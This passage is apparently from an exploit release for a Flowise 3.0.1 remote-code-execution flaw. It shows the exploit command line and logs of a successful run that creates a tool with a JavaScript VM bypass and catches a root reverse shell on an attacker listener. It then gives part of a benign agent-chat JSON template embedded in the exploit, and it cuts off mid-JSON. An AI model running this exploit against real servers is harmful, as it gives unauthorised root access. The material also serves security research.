uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
exit
time=2025-06-05T16:05:43.211-06:00 level=STATUS msg="C2 received shutdown, killing server and client sockets for shell server"
time=2025-06-05T16:05:43.211-06:00 level=STATUS msg="Connection closed for shell server: 10.0.1.10:37866"
time=2025-06-05T16:05:43.211-06:00 level=STATUS msg="C2 server exited"
poptart@grimm $ ./build/vc-2025-1_linux-amd64 -rhost 10.0.1.10 -rport 3000 -v -c -e -lhost 172.17.0.1 -lport 1337 -httpPort 8081 -httpAddr 172.17.0.1 -username [email protected] -password 'Password1!'
time=2025-06-05T16:05:52.099-06:00 level=STATUS msg="Starting listener on 172.17.0.1:1337"
time=2025-06-05T16:05:52.099-06:00 level=STATUS msg="Starting target" index=0 host=10.0.1.10 port=3000 ssl=false "ssl auto"=false
time=2025-06-05T16:05:52.099-06:00 level=STATUS msg="Validating FlowiseAI Flowise target" host=10.0.1.10 port=3000
time=2025-06-05T16:05:52.101-06:00 level=SUCCESS msg="Target verification succeeded!" host=10.0.1.10 port=3000 verified=true
time=2025-06-05T16:05:52.101-06:00 level=STATUS msg="Running a version check on the remote target" host=10.0.1.10 port=3000
time=2025-06-05T16:05:52.102-06:00 level=VERSION msg="The reported version is 3.0.1" host=10.0.1.10 port=3000 version=3.0.1
time=2025-06-05T16:05:52.102-06:00 level=SUCCESS msg="The target appears to be a vulnerable version!" host=10.0.1.10 port=3000 vulnerable=yes
time=2025-06-05T16:05:52.102-06:00 level=STATUS msg="Logging into the application"
time=2025-06-05T16:05:52.132-06:00 level=STATUS msg="Creating Flowise tool with JavaScript VM bypass"
time=2025-06-05T16:05:52.141-06:00 level=STATUS msg="Creating Flowise chat flow"
time=2025-06-05T16:05:52.150-06:00 level=STATUS msg="Triggering chat and tool, expect a callback"
time=2025-06-05T16:05:52.167-06:00 level=SUCCESS msg="Caught new shell from 10.0.1.10:43136"
time=2025-06-05T16:05:52.167-06:00 level=STATUS msg="Active shell from 10.0.1.10:43136"
id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
exit
time=2025-06-05T16:05:53.723-06:00 level=STATUS msg="C2 received shutdown, killing server and client sockets for shell server"
time=2025-06-05T16:05:53.723-06:00 level=STATUS msg="Connection closed for shell server: 10.0.1.10:43136"
time=2025-06-05T16:05:53.724-06:00 level=STATUS msg="C2 server exited"
time=2025-06-05T16:05:53.737-06:00 level=SUCCESS msg="Exploit successfully completed" exploited=true

Support/Build Files

These files are necessary for building the exploit. In particular the .json agent chat files are just template JSON documents containing templates for generating an agent chat workflow but were too cumbersome to properly generate from Go without a schema, so they are just templates and embedded in the exploit:

`OldAgentChat.json` 
{"name":"%s","deployed":false,"isPublic":false,"flowData":"{\"nodes\":[{\"id\":\"seqStart_0\",\"position\":{\"x\":209.05588657569675,\"y\":329.7695246750444},\"type\":\"customNode\",\"data\":{\"id\":\"seqStart_0\",\"label\":\"Start\",\"version\":2,\"name\":\"seqStart\",\"type\":\"Start\",\"baseClasses\":[\"Start\"],\"category\":\"Sequential Agents\",\"description\":\"Starting point of the conversation\",\"inputParams\":[],\"inputAnchors\":[{\"label\":\"Chat Model\",\"name\":\"model\",\"type\":\"BaseChatModel\",\"description\":\"Only compatible with models that are capable of function calling: ChatOpenAI, ChatMistral, ChatAnthropic, ChatGoogleGenerativeAI, ChatVertexAI, GroqChat\",\"id\":\"seqStart_0-input-model-BaseChatModel\"},{\"label\":\"Agent Memory\",\"name\":\"agentMemory\",\"type\":\"BaseCheckpointSaver\",\"description\":\"Save the state of the agent\",\"optional\":true,\"id\":\"seqStart_0-input-agentMemory-BaseCheckpointSaver\"},{\"label\":\"State\",\"name\":\"state\",\"type\":\"State\",\"description\":\"State is an object that is updated by nodes in the graph, passing from one node to another. By default, state contains \\\"messages\\\" that got updated with each message sent and received.\",\"optional\":true,\"id\":\"seqStart_0-input-state-State\"},{\"label\":\"Input Moderation\",\"description\":\"Detect text that could generate harmful output and prevent it from being sent to the language model\",\"name\":\"inputModeration\",\"type\":\"Moderation\",\"optional\":true,\"list\":true,\"id\":\"seqStart_0-input-inputModeration-Moderation\"}],\"inputs\":{\"model\":\"{{chatLocalAI_0.data.instance}}\",\"agentMemory\":\"\",\"state\":\"\",\"inputModeration\":\"\"},\"outputAnchors\":[{\"id\":\"seqStart_0-output-seqStart-Start\",\"name\":\"seqStart\",\"label\":\"Start\",\"description\":\"Starting point of the conversation\",\"type\":\"Start\"}],\"outputs\":{},\"selected\":false},\"width\":300,\"height\":383,\"selected\":false,\"positionAbsolute\":{\"x\":209.05588657569675,\"y\":329.7695246750444},\"dragging\":false},{\"id\":\"seqEnd_0\",\"position\":{\"x\":978.6914259748664,\"y\":483.99349177498516},\"type\":\"customNode\",\"data\":{\"id\":\"seqEnd_0\",\"label\":\"End\",\"version\":2.1,\"name\":\"seqEnd\",\"type\":\"End\",\"baseClasses\":[\"End\"],\"category\":\"Sequential Agents\",\"description\":\"End conversation\",\"inputParams\":[],\"inputAnchors\":[{\"label\":\"Sequential Node\",\"name\":\"sequentialNode\",\"type\":\"Agent | Condition | LLMNode | ToolNode | CustomFunction | ExecuteFlow\",\"description\":\"Can be connected to one of the following nodes: Agent, Condition, LLM Node, Tool Node, Custom Function, Execute Flow\",\"id\":\"seqEnd_0-input-sequentialNode-Agent | Condition | LLMNode | ToolNode | CustomFunction | ExecuteFlow\"}],\"inputs\":{\"sequentialNode\":\"{{seqToolNode_0.data.instance}}\"},\"outputAnchors\":[],\"outputs\":{},\"selected\":false},\"width\":300,\"height\":143,\"selected\":false,\"positionAbsolute\":{\"x\":978.6914259748664,\"y\":483.99349177498516},\"dragging\":false},{\"id\":\"chatLocalAI_0\",\"position\":{\"x\":-238.61322162628937,\"y\":136.00927125517285},\"type\":\"customNode\",\"data\":{\"id\":\"chatLocalAI_0\",\"label\":\"ChatLocalAI\",\"version\":3,\"name\":\"chatLocalAI\",\"type\":\"ChatLocalAI\",\"baseClasses\":[\"ChatLocalAI\",\"BaseChatModel\",\"BaseChatModel\",\"BaseLanguageModel\",\"Runnable\"],\"category\":\"Chat Models\",\"description\":\"Use local LLMs like llama.cpp, gpt4all using LocalAI\",\"inputParams\":[{\"label\":\"Connect Credential\",\"name\":\"credential\",\"type\":\"credential\",\"credentialNames\":[\"localAIApi\"],\"optional\":true,\"id\":\"chatLocalAI_0-input-credential-credential\"},{\"label\":\"Base Path\",\"name\":\"basePath\",\"type\":\"string\",\"placeholder\":\"http://localhost:8080/v1\",\"id\":\"chatLocalAI_0-input-basePath-string\"},{\"label\":\"Model Name\",\"name\":\"modelName\",\"type\":\"string\",\"placeholder\":\"gpt4all-lora-quantized.bin\",\"id\":\"chatLocalAI_0-input-modelName-string\"},{\"label\":\"Temperature\",\"name\":\"temperature\",\"type\":\"number\",\"step\":0.1,\"default\":0.9,\"optional\":true,\"id\":\"chatLocalAI_0-input-temperature-number\"},{\"label\":\"Streaming\",\"name\":\"streaming\",\"type\":\"boolean\",\"default\":true,\"optional\":true,\"additionalParams\":true,\"id\":\"chatLocalAI_0-input-streaming-boolean\"},{\"label\":\"Max Tokens\",\"name\":\"maxTokens\",\"type\":\"number\",\"step\":1,\"optional\":true,\"additionalParams\":true,\"id\":\"chatLocalAI_0-input-maxTokens-number\"},{\"label\":\"Top Probability\",\"name\":\"topP\",\"type\":\"number\",\"step\":0.1,\"optional\":true,\"additionalParams\":true,\"id\":\"chatLocalAI_0-input-topP-number\"},{\"label\":\"Timeout\",\"name\":\"timeout\",\"type\":\"number\",\"step\":1,\"optional\":true,\"additionalParams\":true,\"id\":\"chatLocalAI_0-input-timeout-number\"}],\"inputAnchors\":[{\"label\":\"Cache\",\"name\":\"cache\",\"type\":\"BaseCache\",\"optional\":true,\"id\":\"chatLocalAI_0-input-cache-BaseCache\"}],\"inputs\":{\"cache\":\"\",\"basePath\":\"%s\",\"modelName\":\"test\",\"temperature\":0.9,\"streaming\":false,\"maxTokens\":\"\",\"topP\":\"\",\"timeout\":\"\"},\"outputAnchors\":[{\"id\":\"chatLocalAI_0-output-chatLocalAI-ChatLocalAI|BaseChatModel|BaseChatModel|BaseLanguageModel|Runnable\",\"name\":\"chatLocalAI\",\"label\":\"ChatLocalAI\",\"description\":\"Use local LLMs like llama.cpp, gpt4all using LocalAI\",\"type\":\"ChatLocalAI | BaseChatModel | BaseChatModel | BaseLanguageModel | Runnable\"}],\"outputs\":{},\"selected\":false},\"width\":300,\"height\":675,\"selected\":false,\"positionAbsolute\":{\"x\":-238.61322162628937,\"y\":136.00927125517285},\"dragging\":false},{\"id\":\"seqToolNode_0\",\"position\":{\"x\":741.2264751861816,\"y\":716.1019405286756},\"type\":\"customNode\",\"data\":{\"id\":\"seqToolNode_0\",\"label\":\"Tool Node\",\"version\":2.1,\"name\":\"seqToolNode\",\"type\":\"ToolNode\",\"baseClasses\":[\"ToolNode\"],\"category\":\"Sequential Agents\",\"description\":\"Execute tool and return tool's output\",\"inputParams\":[{\"label\":\"Name\",\"name\":\"toolNodeName\",\"type\":\"string\",\"placeholder\":\"Tool\",\"id\":\"seqToolNode_0-input-toolNodeName-string\"},{\"label\":\"Require Approval\",\"name\":\"interrupt\",\"description\":\"Require approval before executing tools\",\"type\":\"boolean\",\"optional\":true,\"id\":\"seqToolNode_0-input-interrupt-boolean\"},{\"label\":\"Approval Prompt\",\"name\":\"approvalPrompt\",\"description\":\"Prompt for approval. Only applicable if \\\"Require Approval\\\" is enabled\",\"type\":\"string\",\"default\":\"You are about to execute tool: {tools}. Ask if user want to proceed\",\"rows\":4,\"optional\":true,\"additionalParams\":true,\"id\":\"seqToolNode_0-input-approvalPrompt-string\"},{\"label\":\"Approve Button Text\",\"name\":\"approveButtonText\",\"description\":\"Text for approve button. Only applicable if \\\"Require Approval\\\" is enabled\",\"type\":\"string\",\"default\":\"Yes\",\"optional\":true,\"additionalParams\":true,\"id\":\"seqToolNode_0-input-approveButtonText-string\"},{\"label\":\"Reject Button Text\",\"name\":\"rejectButtonText\",\"description\":\"Text for reject button. Only applicable if \\\"Require Approval\\\" is enabled\",\"type\":\"string\",\"default\":\"No\",\"optional\":true,\"additionalParams\":true,\"id\":\"seqToolNode_0-input-rejectButtonText-string\"},{\"label\":\"Update State\",\"name\":\"updateStateMemory\",\"type\":\"tabs\",\"tabIdentifier\":\"selectedUpdateStateMemoryTab\",\"additionalParams\":true,\"default\":\"updateStateMemoryUI\",\"tabs\":[{\"label\":\"Update State (Table)\",\"name\":\"updateStateMemoryUI\",\"type\":\"datagrid\",\"hint\":{\"label\":\"How to use\",\"value\":\"\\n1. Key and value pair to be updated. For example: if you have the following State:\\n    | Key       | Operation     | Default Value     |\\n    |-----------|---------------|-------------------|\\n    | user      | Replace       |                   |\\n\\n    You can update the \\\"user\\\" value with the following:\\n    | Key       | Value     |\\n    |-----------|-----------|\\n    | user      | john doe  |\\n\\n2. If you want to use the Tool Node's output as the value to update state, it is available as available as `$flow.output` with the following structure (array):\\n    ```json\\n    [\\n        {\\n            \\\"tool\\\": \\\"tool's name\\\",\\n            \\\"toolInput\\\": {},\\n            \\\"toolOutput\\\": \\\"tool's output content\\\",\\n            \\\"sourceDocuments\\\": [\\n                {\\n                    \\\"pageContent\\\": \\\"This is the page content\\\",\\n                    \\\"metadata\\\": \\\"{foo: var}\\\"\\n                }\\n            ]\\n        }\\n    ]\\n    ```\\n\\n    For example:\\n    | Key          | Value                                     |\\n    |--------------|-------------------------------------------|\\n    | sources      | `$flow.output[0].toolOutput`       |\\n\\n3. You can get default flow config, including the current \\\"state\\\":\\n    - `$flow.sessionId`\\n    - `$flow.chatId`\\n    - `$flow.chatflowId`\\n    - `$flow.input`\\n    - `$flow.state`\\n\\n4. You can get custom variables: `$vars.<variable-name>`\\n\\n\"},\"description\":\"This is only applicable when you have a custom State at the START node. After tool execution, you might want to update the State values\",\"datagrid\":[{\"field\":\"key\",\"headerName\":\"Key\",\"type\":\"asyncSingleSelect\",\"loadMethod\":\"loadStateKeys\",\"flex\":0.5,\"editable\":true},{\"field\":\"value\",\"headerName\":\"Value\",\"type\":\"freeSolo\",\"valueOptions\":[{\"label\":\"All Tools Output (array)\",\"value\":\"$flow.output\"},{\"label\":\"First Tool Output (string)\",\"value\":\"$flow.output[0].toolOutput\"},{\"label\":\"First Tool Input Arguments (string | json)\",\"value\":\"$flow.output[0].toolInput\"},{\"label\":\"First Tool Returned Source Documents (array)\",\"value\":\"$flow.output[0].sourceDocuments\"},{\"label\":\"Global variable (string)\",\"value\":\"$vars.<variable-name>\"},{\"label\":\"Input Question (string)\",\"value\":\"$flow.input\"},{\"label\":\"Session Id (string)\",\"value\":\"$flow.sessionId\"},{\"label\":\"Chat Id (string)\",\"value\":\"$flow.chatId\"},{\"label\":\"Chatflow Id (string)\",\"value\":\"$flow.chatflowId\"}],\"editable\":true,\"flex\":1}],\"optional\":true,\"additionalParams\":true},{\"label\":\"Update State (Code)\",\"name\":\"updateStateMemoryCode\",\"type\":\"code\",\"hint\":{\"label\":\"How to use\",\"value\":\"\\n1. Return the key value JSON object. For example: if you have the following State:\\n    ```json\\n    {\\n        \\\"user\\\": null\\n    }\\n    ```\\n\\n    You can update the \\\"user\\\" value by returning the following:\\n    ```js\\n    return {\\n        \\\"user\\\": \\\"john doe\\\"\\n    }\\n    ```\\n\\n2. If you want to use the tool's output as the value to update state, it is available as `$flow.output` with the following structure (array):\\n    ```json\\n    [\\n        {\\n            \\\"tool\\\": \\\"tool's name\\\",\\n            \\\"toolInput\\\": {},\\n            \\\"toolOutput\\\": \\\"tool's output content\\\",\\n            \\\"sourceDocuments\\\": [\\n                {\\n                    \\\"pageContent\\\": \\\"This is the page content\\\",\\n                    \\\"metadata\\\": \\\"{foo: var}\\\"\\n                }\\n            ]\\n        }\\n    ]\\n    ```\\n\\n    For example:\\n    ```js\\n    /* Assuming you have the following state:\\n    {\\n        \\\"sources\\\": null\\n    }\\n    */\\n    \\n    return {\\n        \\\"sources\\\": $flow.output[0].toolOutput\\n    }\\n    ```\\n\\n3. You can also get default flow config, including the current \\\"state\\\":\\n    - `$flow.sessionId`\\n    - `$flow.chatId`\\n    - `$flow.chatflowId`\\n    - `$flow.input`\\n    - `$flow.state`\\n\\n4. You can get custom variables: `$vars.<variable-name>`\\n\\n\"},\"description\":\"This is only applicable when you have a custom State at the START node. After tool execution, you might want to update the State values. Must return an object representing the state\",\"hideCodeExecute\":true,\"codeExample\":\"const result = $flow.output;\\n\\n/* Suppose we have a custom State schema like this:\\n* {\\n    aggregate: {\\n        value: (x, y) => x.concat(y),\\n        default: () => []\\n    }\\n  }\\n*/\\n\\nreturn {\\n  aggregate: [result.content]\\n};\",\"optional\":true,\"additionalParams\":true}],\"id\":\"seqToolNode_0-input-updateStateMemory-tabs\"}],\"inputAnchors\":[{\"label\":\"Tools\",\"name\":\"tools\",\"type\":\"Tool\",\"list\":true,\"optional\":true,\"id\":\"seqToolNode_0-input-tools-Tool\"},{\"label\":\"LLM Node\",\"name\":\"llmNode\",\"type\":\"LLMNode\",\"id\":\"seqToolNode_0-input-llmNode-LLMNode\"}],\"inputs\":{\"tools\":[\"{{customTool_0.data.instance}}\"],\"llmNode\":\"{{seqLLMNode_0.data.instance}}\",\"toolNodeName\":\"tool node\",\"interrupt\":\"\",\"approvalPrompt\":\"You are about to execute tool: {tools}. Ask if user want to proceed\",\"approveButtonText\":\"Yes\",\"rejectButtonText\":\"No\",\"updateStateMemory\":\"updateStateMemoryUI\"},\"outputAnchors\":[{\"id\":\"seqToolNode_0-output-seqToolNode-ToolNode\",\"name\":\"seqToolNode\",\"label\":\"ToolNode\",\"description\":\"Execute tool and return tool's output\",\"type\":\"ToolNode\"}],\"outputs\":{},\"selected\":false},\"width\":300,\"height\":529,\"selected\":false,\"positionAbsolute\":{\"x\":741.2264751861816,\"y\":716.1019405286756},\"dragging\":false},{\"id\":\"seqLLMNode_0\",\"position\":{\"x\":579.2600071315995,\"y\":164.72673013009904},\"type\":\"customNode\",\"data\":{\"id\":\"seqLLMNode_0\",\"label\":\"LLM Node\",\"version\":4.1,\"name\":\"seqLLMNode\",\"type\":\"LLMNode\",\"baseClasses\":[\"LLMNode\"],\"category\":\"Sequential Agents\",\"description\":\"Run Chat Model and return the output\",\"inputParams\":[{\"label\":\"Name\",\"name\":\"llmNodeName\",\"type\":\"string\",\"placeholder\":\"LLM\",\"id\":\"seqLLMNode_0-input-llmNodeName-string\"},{\"label\":\"System Prompt\",\"name\":\"systemMessagePrompt\",\"type\":\"string\",\"rows\":4,\"optional\":true,\"additionalParams\":true,\"id\":\"seqLLMNode_0-input-systemMessagePrompt-string\"},{\"label\":\"Prepend Messages History\",\"name\":\"messageHistory\",\"description\":\"Prepend a list of messages between System Prompt and Human Prompt. This is useful when you want to provide few shot examples\",\"type\":\"code\",\"hideCodeExecute\":true,\"codeExample\":\"const { AIMessage, HumanMessage, ToolMessage } = require('@langchain/core/messages');\\n\\nreturn [\\n    new HumanMessage(\\\"What is 333382 🦜 1932?\\\"),\\n    new AIMessage({\\n        content: \\\"\\\",\\n        tool_calls: [\\n        {\\n            id: \\\"12345\\\",\\n            name: \\\"calulator\\\",\\n            args: {\\n                number1: 333382,\\n                number2: 1932,\\n                operation: \\\"divide\\\",\\n            },\\n        },\\n        ],\\n    }),\\n    new ToolMessage({\\n        tool_call_id: \\\"12345\\\",\\n        content: \\\"The answer is 172.558.\\\",\\n    }),\\n    new AIMessage(\\\"The answer is 172.558.\\\"),\\n]\",\"optional\":true,\"additionalParams\":true,\"id\":\"seqLLMNode_0-input-messageHistory-code\"},{\"label\":\"Conversation History\",\"name\":\"conversationHistorySelection\",\"type\":\"options\",\"options\":[{\"label\":\"User Question\",\"name\":\"user_question\",\"description\":\"Use the user question from the historical conversation messages as input.\"},{\"label\":\"Last Conversation Message\",\"name\":\"last_message\",\"description\":\"Use the last conversation message from the historical conversation messages as input.\"},{\"label\":\"All Conversation Messages\",\"name\":\"all_messages\",\"description\":\"Use all conversation messages from the historical conversation messages as input.\"},{\"label\":\"Empty\",\"name\":\"empty\",\"description\":\"Do not use any messages from the conversation history. Ensure to use either System Prompt, Human Prompt, or Messages History.\"}],\"default\":\"all_messages\",\"optional\":true,\"description\":\"Select which messages from the conversation history to include in the prompt. The selected messages will be inserted between the System Prompt (if defined) and [Messages History, Human Prompt].\",\"additionalParams\":true,\"id\":\"seqLLMNode_0-input-conversationHistorySelection-options\"},{\"label\":\"Human Prompt\",\"name\":\"humanMessagePrompt\",\"type\":\"string\",\"description\":\"This prompt will be added at the end of the messages as human message\",\"rows\":4,\"optional\":true,\"additionalParams\":true,\"id\":\"seqLLMNode_0-input-humanMessagePrompt-string\"},{\"label\":\"Format Prompt Values\",\"name\":\"promptValues\",\"description\":\"Assign values to the prompt variables. You can also use $flow.state.<variable-name> to get the state value\",\"type\":\"json\",\"optional\":true,\"acceptVariable\":true,\"list\":true,\"additionalParams\":true,\"id\":\"seqLLMNode_0-input-promptValues-json\"},{\"label\":\"JSON Structured Output\",\"name\":\"llmStructuredOutput\",\"type\":\"datagrid\",\"description\":\"Instruct the LLM to give output in a JSON structured schema\",\"datagrid\":[{\"field\":\"key\",\"headerName\":\"Key\",\"editable\":true},{\"field\":\"type\",\"headerName\":\"Type\",\"type\":\"singleSelect\",\"valueOptions\":[\"String\",\"String Array\",\"Number\",\"Boolean\",\"Enum\"],\"editable\":true},{\"field\":\"enumValues\",\"headerName\":\"Enum Values\",\"editable\":true},{\"field\":\"description\",\"headerName\":\"Description\",\"flex\":1,\"editable\":true}],\"optional\":true,\"additionalParams\":true,\"id\":\"seqLLMNode_0-input-llmStructuredOutput-datagrid\"},{\"label\":\"Update State\",\"name\":\"updateStateMemory\",\"type\":\"tabs\",\"tabIdentifier\":\"selectedUpdateStateMemoryTab\",\"default\":\"updateStateMemoryUI\",\"additionalParams\":true,\"tabs\":[{\"label\":\"Update State (Table)\",\"name\":\"updateStateMemoryUI\",\"type\":\"datagrid\",\"hint\":{\"label\":\"How to use\",\"value\":\"\\n1. Key and value pair to be updated. For example: if you have the following State:\\n    | Key       | Operation     | Default Value     |\\n    |-----------|---------------|-------------------|\\n    | user      | Replace       |                   |\\n\\n    You can update the \\\"user\\\" value with the following:\\n    | Key       | Value     |\\n    |-----------|-----------|\\n    | user      | john doe  |\\n\\n2. If you want to use the LLM Node's output as the value to update state, it is available as available as `$flow.output` with the following structure:\\n    ```json\\n    {\\n        \\\"content\\\": 'Hello! How can I assist you today?',\\n        \\\"name\\\": \\\"\\\",\\n        \\\"additional_kwargs\\\": {},\\n        \\\"response_metadata\\\": {},\\n        \\\"tool_calls\\\": [],\\n        \\\"invalid_tool_calls\\\": [],\\n        \\\"usage_metadata\\\": {}\\n    }\\n    ```\\n\\n    For example, if the output `content` is the value you want to update the state with, you can do the following:\\n    | Key       | Value                     |\\n    |-----------|---------------------------|\\n    | user      | `$flow.output.content`  |\\n\\n3. You can get default flow config, including the current \\\"state\\\":\\n    - `$flow.sessionId`\\n    - `$flow.chatId`\\n    - `$flow.chatflowId`\\n    - `$flow.input`\\n    - `$flow.state`\\n\\n4. You can get custom variables: `$vars.<variable-name>`\\n\\n\"},\"description\":\"This is only applicable when you have a custom State at the START node. After agent execution, you might want to update the State values\",\"datagrid\":[{\"field\":\"key\",\"headerName\":\"Key\",\"type\":\"asyncSingleSelect\",\"loadMethod\":\"loadStateKeys\",\"flex\":0.5,\"editable\":true},{\"field\":\"value\",\"headerName\":\"Value\",\"type\":\"freeSolo\",\"valueOptions\":[{\"label\":\"LLM Node Output (string)\",\"value\":\"$flow.output.content\"},{\"label\":\"LLM JSON Output Key (string)\",\"value\":\"$flow.output.<replace-with-key>\"},{\"label\":\"Global variable (string)\",\"value\":\"$vars.<variable-name>\"},{\"label\":\"Input Question (string)\",\"value\":\"$flow.input\"},{\"label\":\"Session Id (string)\",\"value\":\"$flow.sessionId\"},{\"label\":\"Chat Id (string)\",\"value\":\"$flow.chatId\"},{\"label\":\"Chatflow Id (string)\",\"value\":\"$flow.chatflowId\"}],\"editable\":true,\"flex\":1}],\"optional\":true,\"additionalParams\":true},{\"label\":\"Update State (Code)\",\"name\":\"updateStateMemoryCode\",\"type\":\"code\",\"hint\":{\"label\":\"How to use\",\"value\":\"\\n1. Return the key value JSON object. For example: if you have the following State:\\n    ```json\\n    {\\n        \\\"user\\\": null\\n    }\\n    ```\\n\\n    You can update the \\\"user\\\" value by returning the following:\\n    ```js\\n    return {\\n        \\\"user\\\": \\\"john doe\\\"\\n    }\\n    ```\\n\\n2. If you want to use the LLM Node's output as the value to update state, it is available as `$flow.output` with the following structure:\\n    ```json\\n    {\\n        \\\"content\\\": 'Hello! How can I assist you today?',\\n        \\\"name\\\": \\\"\\\",\\n        \\\"additional_kwargs\\\": {},\\n        \\\"response_metadata\\\": {},\\n        \\\"tool_calls\\\": [],\\n        \\\"invalid_tool_calls\\\": [],\\n        \\\"usage_metadata\\\": {}\\n    }\\n    ```\\n\\n    For example, if the output `content` is the value you want to update the state with, you can return the following:\\n    ```js\\n    return {\\n        \\\"user\\\": $flow.output.content\\n    }\\n    ```\\n\\n3. You can also get default flow config, including the current \\\"state\\\":\\n    - `$flow.sessionId`\\n    - `$flow.chatId`\\n    - `$flow.chatflowId`\\n    - `$flow.input`\\n    - `$flow.state`\\n\\n4. You can get custom variables: `$vars.<variable-name>`\\n\\n\"},\"description\":\"This is only applicable when you have a custom State at the START node. After agent execution, you might want to update the State values. Must return an object representing the state\",\"hideCodeExecute\":true,\"codeExample\":\"const result = $flow.output;\\n\\n/* Suppose we have a custom State schema like this:\\n* {\\n    aggregate: {\\n        value: (x, y) => x.concat(y),\\n        default: () => []\\n    }\\n  }\\n*/\\n\\nreturn {\\n  aggregate: [result.content]\\n};\",\"optional\":true,\"additionalParams\":true}],\"id\":\"seqLLMNode_0-input-updateStateMemory-tabs\"}],\"inputAnchors\":[{\"label\":\"Sequential Node\",\"name\":\"sequentialNode\",\"type\":\"Start | Agent | Condition | LLMNode | ToolNode | CustomFunction | ExecuteFlow\",\"description\":\"Can be connected to one of the following nodes: Start, Agent, Condition, LLM, Tool Node, Custom Function, Execute Flow\",\"list\":true,\"id\":\"seqLLMNode_0-input-sequentialNode-Start | Agent | Condition | LLMNode | ToolNode | CustomFunction | ExecuteFlow\"},{\"label\":\"Chat Model\",\"name\":\"model\",\"type\":\"BaseChatModel\",\"optional\":true,\"description\":\"Overwrite model to be used for this node\",\"id\":\"seqLLMNode_0-input-model-BaseChatModel\"}],\"inputs\":{\"llmNodeName\":\"llm\",\"systemMessagePrompt\":\"\",\"messageHistory\":\"\",\"conversationHistorySelection\":\"all_messages\",\"humanMessagePrompt\":\"\",\"sequentialNode\":[\"{{seqStart_0.data.instance}}\"],\"model\":\"\",\"promptValues\":\"\",\"llmStructuredOutput\":\"\",\"updateStateMemory\":\"updateStateMemoryUI\"},\"outputAnchors\":[{\"id\":\"seqLLMNode_0-output-seqLLMNode-LLMNode\",\"name\":\"seqLLMNode\",\"label\":\"LLMNode\",\"description\":\"Run Chat Model and return the output\",\"type\":\"LLMNode\"}],\"outputs\":{},\"selected\":false},\"width\":300,\"height\":433,\"selected\":false,\"positionAbsolute\":{\"x\":579.2600071315995,\"y\":164.72673013009904},\"dragging\":false},{\"id\":\"customTool_0\",\"position\":{\"x\":-128.33817954657417,\"y\":912.5293592331686},\"type\":\"customNode\",\"data\":{\"id\":\"customTool_0\",\"label\":\"Custom Tool\",\"version\":3,\"name\":\"customTool\",\"type\":\"CustomTool\",\"baseClasses\":[\"CustomTool\",\"Tool\",\"StructuredTool\",\"Runnable\"],\"category\":\"Tools\",\"description\":\"Use custom tool you've created in Flowise within chatflow\",\"inputParams\":[{\"label\":\"Select Tool\",\"name\":\"selectedTool\",\"type\":\"asyncOptions\",\"loadMethod\":\"listTools\",\"id\":\"customTool_0-input-selectedTool-asyncOptions\"},{\"label\":\"Return Direct\",\"name\":\"returnDirect\",\"description\":\"Return the output of the tool directly to the user\",\"type\":\"boolean\",\"optional\":true,\"id\":\"customTool_0-input-returnDirect-boolean\"},{\"label\":\"Custom Tool Name\",\"name\":\"customToolName\",\"type\":\"string\",\"hidden\":true,\"id\":\"customTool_0-input-customToolName-string\"},{\"label\":\"Custom Tool Description\",\"name\":\"customToolDesc\",\"type\":\"string\",\"hidden\":true,\"id\":\"customTool_0-input-customToolDesc-string\"},{\"label\":\"Custom Tool Schema\",\"name\":\"customToolSchema\",\"type\":\"string\",\"hidden\":true,\"id\":\"customTool_0-input-customToolSchema-string\"},{\"label\":\"Custom Tool Func\",\"name\":\"customToolFunc\",\"type\":\"string\",\"hidden\":true,\"id\":\"customTool_0-input-customToolFunc-string\"}],\"inputAnchors\":[],\"inputs\":{\"selectedTool\":\"%s\",\"returnDirect\":true,\"customToolName\":\"\",\"customToolDesc\":\"\",\"customToolSchema\":\"\",\"customToolFunc\":\"\"},\"outputAnchors\":[{\"id\":\"customTool_0-output-customTool-CustomTool|Tool|StructuredTool|Runnable\",\"name\":\"customTool\",\"label\":\"CustomTool\",\"description\":\"Use custom tool you've created in Flowise within chatflow\",\"type\":\"CustomTool | Tool | StructuredTool | Runnable\"}],\"outputs\":{},\"selected\":false},\"width\":300,\"height\":372,\"selected\":false,\"positionAbsolute\":{\"x\":-128.33817954657417,\"y\":912.5293592331686},\"dragging\":false}],\"edges\":[{\"source\":\"chatLocalAI_0\",\"sourceHandle\":\"chatLocalAI_0-output-chatLocalAI-ChatLocalAI|BaseChatModel|BaseChatModel|BaseLanguageModel|Runnable\",\"target\":\"seqStart_0\",\"targetHandle\":\"seqStart_0-input-model-BaseChatModel\",\"type\":\"buttonedge\",\"id\":\"chatLocalAI_0-chatLocalAI_0-output-chatLocalAI-ChatLocalAI|BaseChatModel|BaseChatModel|BaseLanguageModel|Runnable-seqStart_0-seqStart_0-input-model-BaseChatModel\"},{\"source\":\"seqToolNode_0\",\"sourceHandle\":\"seqToolNode_0-output-seqToolNode-ToolNode\",\"target\":\"seqEnd_0\",\"targetHandle\":\"seqEnd_0-input-sequentialNode-Agent | Condition | LLMNode | ToolNode | CustomFunction | ExecuteFlow\",\"type\":\"buttonedge\",\"id\":\"seqToolNode_0-seqToolNode_0-output-seqToolNode-ToolNode-seqEnd_0-seqEnd_0-input-sequentialNode-Agent | Condition | LLMNode | ToolNode | CustomFunction | ExecuteFlow\"},{\"source\":\"seqStart_0\",\"sourceHandle\":\"seqStart_0-output-seqStart-Start\",\"target\":\"seqLLMNode_0\",\"targetHandle\":\"seqLLMNode_0-input-sequentialNode-Start | Agent | Condition | LLMNode | ToolNode | CustomFunction | ExecuteFlow\",\"type\":\"buttonedge\",\"id\":\"seqStart_0-seqStart_0-output-seqStart-Start-seqLLMNode_0-seqLLMNode_0-input-sequentialNode-Start | Agent | Condition | LLMNode | ToolNode | CustomFunction | 